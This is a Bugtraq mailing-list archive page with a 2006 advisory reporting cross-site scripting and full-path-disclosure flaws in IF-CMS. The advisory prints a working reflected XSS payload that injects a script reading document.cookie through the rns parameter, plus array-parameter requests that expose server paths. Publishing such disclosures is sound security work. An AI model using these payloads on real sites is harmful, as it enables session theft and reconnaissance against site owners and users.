[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

IF-CMS multiples XSS vunerabilities

To: bugtraq@xxxxxxxxxxxxxxxxx
Subject: IF-CMS multiples XSS vunerabilities
From: saps.audit@xxxxxxxxx
Date: 4 Nov 2006 19:11:55 -0000

vendor site: http://www.rhadrix.com/
risk : low 

xss =
/index.php?rns=</title><script>alert(document.cookie)</script>

full path ( array )
/index.php?rns[]=
/index.php?pag[]=

benjamin mossé & laurent gaffié
http://s-a-p.ca/

Prev by Date: Re: MajorSecurity Advisory #31]Xenis.creator CMS - Multiple Cross Site Scripting and SQL Injection Issues
Next by Date: Re: Internet Explorer 7 - Still Spyware Writers' Heaven
Previous by thread: [USN-377-1] NVIDIA vulnerability
Next by thread: @cid stats v2.3 File Include
Index(es):
- Date
- Thread